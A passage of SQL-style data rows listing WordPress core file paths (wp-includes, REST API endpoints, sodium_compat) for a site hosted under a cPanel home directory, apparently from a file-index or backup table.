(5498, '/home/equipm11/public_html/happythinking.com/wp-includes/link-template.php', 'wp-includes/link-template.php'),
(5499, '/home/equipm11/public_html/happythinking.com/wp-includes/load.php', 'wp-includes/load.php'),
(5500, '/home/equipm11/public_html/happythinking.com/wp-includes/locale.php', 'wp-includes/locale.php'),
(5501, '/home/equipm11/public_html/happythinking.com/wp-includes/media-template.php', 'wp-includes/media-template.php'),
(5502, '/home/equipm11/public_html/happythinking.com/wp-includes/media.php', 'wp-includes/media.php'),
(5503, '/home/equipm11/public_html/happythinking.com/wp-includes/meta.php', 'wp-includes/meta.php'),
(5504, '/home/equipm11/public_html/happythinking.com/wp-includes/ms-blogs.php', 'wp-includes/ms-blogs.php'),
(5505, '/home/equipm11/public_html/happythinking.com/wp-includes/ms-default-constants.php', 'wp-includes/ms-default-constants.php'),
(5506, '/home/equipm11/public_html/happythinking.com/wp-includes/ms-default-filters.php', 'wp-includes/ms-default-filters.php'),
(5507, '/home/equipm11/public_html/happythinking.com/wp-includes/ms-deprecated.php', 'wp-includes/ms-deprecated.php'),
(5508, '/home/equipm11/public_html/happythinking.com/wp-includes/ms-files.php', 'wp-includes/ms-files.php'),
(5509, '/home/equipm11/public_html/happythinking.com/wp-includes/ms-functions.php', 'wp-includes/ms-functions.php'),
(5510, '/home/equipm11/public_html/happythinking.com/wp-includes/ms-load.php', 'wp-includes/ms-load.php'),
(5511, '/home/equipm11/public_html/happythinking.com/wp-includes/ms-network.php', 'wp-includes/ms-network.php'),
(5512, '/home/equipm11/public_html/happythinking.com/wp-includes/ms-settings.php', 'wp-includes/ms-settings.php'),
(5513, '/home/equipm11/public_html/happythinking.com/wp-includes/ms-site.php', 'wp-includes/ms-site.php'),
(5514, '/home/equipm11/public_html/happythinking.com/wp-includes/nav-menu-template.php', 'wp-includes/nav-menu-template.php'),
(5515, '/home/equipm11/public_html/happythinking.com/wp-includes/nav-menu.php', 'wp-includes/nav-menu.php'),
(5516, '/home/equipm11/public_html/happythinking.com/wp-includes/option.php', 'wp-includes/option.php'),
(5517, '/home/equipm11/public_html/happythinking.com/wp-includes/php-compat/readonly.php', 'wp-includes/php-compat/readonly.php'),
(5518, '/home/equipm11/public_html/happythinking.com/wp-includes/pluggable-deprecated.php', 'wp-includes/pluggable-deprecated.php'),
(5519, '/home/equipm11/public_html/happythinking.com/wp-includes/pluggable.php', 'wp-includes/pluggable.php'),
(5520, '/home/equipm11/public_html/happythinking.com/wp-includes/plugin.php', 'wp-includes/plugin.php'),
(5521, '/home/equipm11/public_html/happythinking.com/wp-includes/pomo/entry.php', 'wp-includes/pomo/entry.php'),
(5522, '/home/equipm11/public_html/happythinking.com/wp-includes/pomo/mo.php', 'wp-includes/pomo/mo.php'),
(5523, '/home/equipm11/public_html/happythinking.com/wp-includes/pomo/plural-forms.php', 'wp-includes/pomo/plural-forms.php'),
(5524, '/home/equipm11/public_html/happythinking.com/wp-includes/pomo/po.php', 'wp-includes/pomo/po.php'),
(5525, '/home/equipm11/public_html/happythinking.com/wp-includes/pomo/streams.php', 'wp-includes/pomo/streams.php'),
(5526, '/home/equipm11/public_html/happythinking.com/wp-includes/pomo/translations.php', 'wp-includes/pomo/translations.php'),
(5527, '/home/equipm11/public_html/happythinking.com/wp-includes/post-formats.php', 'wp-includes/post-formats.php'),
(5528, '/home/equipm11/public_html/happythinking.com/wp-includes/post-template.php', 'wp-includes/post-template.php'),
(5529, '/home/equipm11/public_html/happythinking.com/wp-includes/post-thumbnail-template.php', 'wp-includes/post-thumbnail-template.php'),
(5530, '/home/equipm11/public_html/happythinking.com/wp-includes/post.php', 'wp-includes/post.php'),
(5531, '/home/equipm11/public_html/happythinking.com/wp-includes/query.php', 'wp-includes/query.php'),
(5532, '/home/equipm11/public_html/happythinking.com/wp-includes/registration-functions.php', 'wp-includes/registration-functions.php'),
(5533, '/home/equipm11/public_html/happythinking.com/wp-includes/registration.php', 'wp-includes/registration.php'),
(5534, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/class-wp-rest-request.php', 'wp-includes/rest-api/class-wp-rest-request.php'),
(5535, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/class-wp-rest-response.php', 'wp-includes/rest-api/class-wp-rest-response.php'),
(5536, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/class-wp-rest-server.php', 'wp-includes/rest-api/class-wp-rest-server.php'),
(5537, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php'),
(5538, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php'),
(5539, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php'),
(5540, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-block-directory-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-block-directory-controller.php'),
(5541, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-block-pattern-categories-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-block-pattern-categories-controller.php'),
(5542, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-block-patterns-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-block-patterns-controller.php'),
(5543, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php'),
(5544, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-block-types-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-block-types-controller.php'),
(5545, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php'),
(5546, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php'),
(5547, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-controller.php'),
(5548, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-edit-site-export-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-edit-site-export-controller.php'),
(5549, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-font-collections-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-font-collections-controller.php'),
(5550, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-font-faces-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-font-faces-controller.php'),
(5551, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-font-families-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-font-families-controller.php'),
(5552, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-global-styles-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-global-styles-controller.php'),
(5553, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-global-styles-revisions-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-global-styles-revisions-controller.php'),
(5554, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-menu-items-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-menu-items-controller.php'),
(5555, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-menu-locations-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-menu-locations-controller.php'),
(5556, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-menus-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-menus-controller.php'),
(5557, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-navigation-fallback-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-navigation-fallback-controller.php'),
(5558, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-pattern-directory-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-pattern-directory-controller.php'),
(5559, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php'),
(5560, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php'),
(5561, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php'),
(5562, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php'),
(5563, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php'),
(5564, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php'),
(5565, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php'),
(5566, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-sidebars-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-sidebars-controller.php'),
(5567, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php'),
(5568, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php'),
(5569, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-template-autosaves-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-template-autosaves-controller.php'),
(5570, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-template-revisions-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-template-revisions-controller.php'),
(5571, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-templates-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-templates-controller.php'),
(5572, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php'),
(5573, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php'),
(5574, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-url-details-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-url-details-controller.php'),
(5575, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php'),
(5576, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-widget-types-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-widget-types-controller.php'),
(5577, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/endpoints/class-wp-rest-widgets-controller.php', 'wp-includes/rest-api/endpoints/class-wp-rest-widgets-controller.php'),
(5578, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php', 'wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php'),
(5579, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/fields/class-wp-rest-meta-fields.php', 'wp-includes/rest-api/fields/class-wp-rest-meta-fields.php'),
(5580, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php', 'wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php'),
(5581, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php', 'wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php'),
(5582, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php', 'wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php'),
(5583, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php', 'wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php'),
(5584, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/search/class-wp-rest-post-search-handler.php', 'wp-includes/rest-api/search/class-wp-rest-post-search-handler.php'),
(5585, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/search/class-wp-rest-search-handler.php', 'wp-includes/rest-api/search/class-wp-rest-search-handler.php'),
(5586, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api/search/class-wp-rest-term-search-handler.php', 'wp-includes/rest-api/search/class-wp-rest-term-search-handler.php'),
(5587, '/home/equipm11/public_html/happythinking.com/wp-includes/rest-api.php', 'wp-includes/rest-api.php'),
(5588, '/home/equipm11/public_html/happythinking.com/wp-includes/revision.php', 'wp-includes/revision.php'),
(5589, '/home/equipm11/public_html/happythinking.com/wp-includes/rewrite.php', 'wp-includes/rewrite.php'),
(5590, '/home/equipm11/public_html/happythinking.com/wp-includes/robots-template.php', 'wp-includes/robots-template.php'),
(5591, '/home/equipm11/public_html/happythinking.com/wp-includes/rss-functions.php', 'wp-includes/rss-functions.php'),
(5592, '/home/equipm11/public_html/happythinking.com/wp-includes/rss.php', 'wp-includes/rss.php'),
(5593, '/home/equipm11/public_html/happythinking.com/wp-includes/script-loader.php', 'wp-includes/script-loader.php'),
(5594, '/home/equipm11/public_html/happythinking.com/wp-includes/script-modules.php', 'wp-includes/script-modules.php'),
(5595, '/home/equipm11/public_html/happythinking.com/wp-includes/session.php', 'wp-includes/session.php'),
(5596, '/home/equipm11/public_html/happythinking.com/wp-includes/shortcodes.php', 'wp-includes/shortcodes.php'),
(5597, '/home/equipm11/public_html/happythinking.com/wp-includes/sitemaps/class-wp-sitemaps-index.php', 'wp-includes/sitemaps/class-wp-sitemaps-index.php'),
(5598, '/home/equipm11/public_html/happythinking.com/wp-includes/sitemaps/class-wp-sitemaps-provider.php', 'wp-includes/sitemaps/class-wp-sitemaps-provider.php'),
(5599, '/home/equipm11/public_html/happythinking.com/wp-includes/sitemaps/class-wp-sitemaps-registry.php', 'wp-includes/sitemaps/class-wp-sitemaps-registry.php'),
(5600, '/home/equipm11/public_html/happythinking.com/wp-includes/sitemaps/class-wp-sitemaps-renderer.php', 'wp-includes/sitemaps/class-wp-sitemaps-renderer.php'),
(5601, '/home/equipm11/public_html/happythinking.com/wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php', 'wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php'),
(5602, '/home/equipm11/public_html/happythinking.com/wp-includes/sitemaps/class-wp-sitemaps.php', 'wp-includes/sitemaps/class-wp-sitemaps.php'),
(5603, '/home/equipm11/public_html/happythinking.com/wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php', 'wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php'),
(5604, '/home/equipm11/public_html/happythinking.com/wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php', 'wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php'),
(5605, '/home/equipm11/public_html/happythinking.com/wp-includes/sitemaps/providers/class-wp-sitemaps-users.php', 'wp-includes/sitemaps/providers/class-wp-sitemaps-users.php'),
(5606, '/home/equipm11/public_html/happythinking.com/wp-includes/sitemaps.php', 'wp-includes/sitemaps.php'),
(5607, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/LICENSE', 'wp-includes/sodium_compat/LICENSE'),
(5608, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/autoload-php7.php', 'wp-includes/sodium_compat/autoload-php7.php'),
(5609, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/autoload.php', 'wp-includes/sodium_compat/autoload.php'),
(5610, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/composer.json', 'wp-includes/sodium_compat/composer.json'),
(5611, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/lib/constants.php', 'wp-includes/sodium_compat/lib/constants.php'),
(5612, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/lib/namespaced.php', 'wp-includes/sodium_compat/lib/namespaced.php'),
(5613, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/lib/php72compat.php', 'wp-includes/sodium_compat/lib/php72compat.php'),
(5614, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/lib/php72compat_const.php', 'wp-includes/sodium_compat/lib/php72compat_const.php'),
(5615, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/lib/ristretto255.php', 'wp-includes/sodium_compat/lib/ristretto255.php'),
(5616, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/lib/sodium_compat.php', 'wp-includes/sodium_compat/lib/sodium_compat.php'),
(5617, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/lib/stream-xchacha20.php', 'wp-includes/sodium_compat/lib/stream-xchacha20.php'),
(5618, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Compat.php', 'wp-includes/sodium_compat/namespaced/Compat.php'),
(5619, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php', 'wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php'),
(5620, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php', 'wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php'),
(5621, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php', 'wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php'),
(5622, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php', 'wp-includes/sodium_compat/namespaced/Core/ChaCha20.php'),
(5623, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php', 'wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php'),
(5624, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php', 'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php'),
(5625, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php', 'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php'),
(5626, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php', 'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php'),
(5627, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php', 'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php'),
(5628, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php', 'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php'),
(5629, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php', 'wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php'),
(5630, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/Curve25519.php', 'wp-includes/sodium_compat/namespaced/Core/Curve25519.php'),
(5631, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/Ed25519.php', 'wp-includes/sodium_compat/namespaced/Core/Ed25519.php'),
(5632, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php', 'wp-includes/sodium_compat/namespaced/Core/HChaCha20.php'),
(5633, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php', 'wp-includes/sodium_compat/namespaced/Core/HSalsa20.php'),
(5634, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php', 'wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php'),
(5635, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/Poly1305.php', 'wp-includes/sodium_compat/namespaced/Core/Poly1305.php'),
(5636, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/Salsa20.php', 'wp-includes/sodium_compat/namespaced/Core/Salsa20.php'),
(5637, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/SipHash.php', 'wp-includes/sodium_compat/namespaced/Core/SipHash.php'),
(5638, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/Util.php', 'wp-includes/sodium_compat/namespaced/Core/Util.php'),
(5639, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/X25519.php', 'wp-includes/sodium_compat/namespaced/Core/X25519.php'),
(5640, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php', 'wp-includes/sodium_compat/namespaced/Core/XChaCha20.php'),
(5641, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php', 'wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php'),
(5642, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Crypto.php', 'wp-includes/sodium_compat/namespaced/Crypto.php'),
(5643, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/File.php', 'wp-includes/sodium_compat/namespaced/File.php'),
(5644, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Compat.php', 'wp-includes/sodium_compat/src/Compat.php'),
(5645, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/BLAKE2b.php', 'wp-includes/sodium_compat/src/Core/BLAKE2b.php'),
(5646, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Base64/Common.php', 'wp-includes/sodium_compat/src/Core/Base64/Common.php'),
(5647, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Base64/Original.php', 'wp-includes/sodium_compat/src/Core/Base64/Original.php'),
(5648, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php', 'wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php'),
(5649, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php', 'wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php'),
(5650, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php', 'wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php'),
(5651, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/ChaCha20.php', 'wp-includes/sodium_compat/src/Core/ChaCha20.php'),
(5652, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Curve25519/Fe.php', 'wp-includes/sodium_compat/src/Core/Curve25519/Fe.php'),
(5653, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php', 'wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php'),
(5654, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php', 'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php'),
(5655, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php', 'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php'),
(5656, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php', 'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php'),
(5657, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php', 'wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php'),
(5658, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Curve25519/H.php', 'wp-includes/sodium_compat/src/Core/Curve25519/H.php'),
(5659, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Curve25519/README.md', 'wp-includes/sodium_compat/src/Core/Curve25519/README.md'),
(5660, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Curve25519.php', 'wp-includes/sodium_compat/src/Core/Curve25519.php'),
(5661, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Ed25519.php', 'wp-includes/sodium_compat/src/Core/Ed25519.php'),
(5662, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/HChaCha20.php', 'wp-includes/sodium_compat/src/Core/HChaCha20.php'),
(5663, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/HSalsa20.php', 'wp-includes/sodium_compat/src/Core/HSalsa20.php'),
(5664, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Poly1305/State.php', 'wp-includes/sodium_compat/src/Core/Poly1305/State.php'),
(5665, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Poly1305.php', 'wp-includes/sodium_compat/src/Core/Poly1305.php'),
(5666, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Ristretto255.php', 'wp-includes/sodium_compat/src/Core/Ristretto255.php'),
(5667, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Salsa20.php', 'wp-includes/sodium_compat/src/Core/Salsa20.php'),
(5668, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/SecretStream/State.php', 'wp-includes/sodium_compat/src/Core/SecretStream/State.php'),
(5669, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/SipHash.php', 'wp-includes/sodium_compat/src/Core/SipHash.php'),
(5670, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Util.php', 'wp-includes/sodium_compat/src/Core/Util.php'),
(5671, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/X25519.php', 'wp-includes/sodium_compat/src/Core/X25519.php'),
(5672, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/XChaCha20.php', 'wp-includes/sodium_compat/src/Core/XChaCha20.php'),
(5673, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/XSalsa20.php', 'wp-includes/sodium_compat/src/Core/XSalsa20.php'),
(5674, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/BLAKE2b.php', 'wp-includes/sodium_compat/src/Core32/BLAKE2b.php'),
(5675, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php', 'wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php'),
(5676, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php', 'wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php'),
(5677, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/ChaCha20.php', 'wp-includes/sodium_compat/src/Core32/ChaCha20.php'),
(5678, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php', 'wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php'),
(5679, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php', 'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php'),
(5680, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php', 'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php'),
(5681, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php', 'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php'),
(5682, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php', 'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php'),
(5683, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php', 'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php'),
(5684, '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/Curve25519/H.php', 'wp-includes/sodium_compat/src/Core32/Curve25519/H.php'),
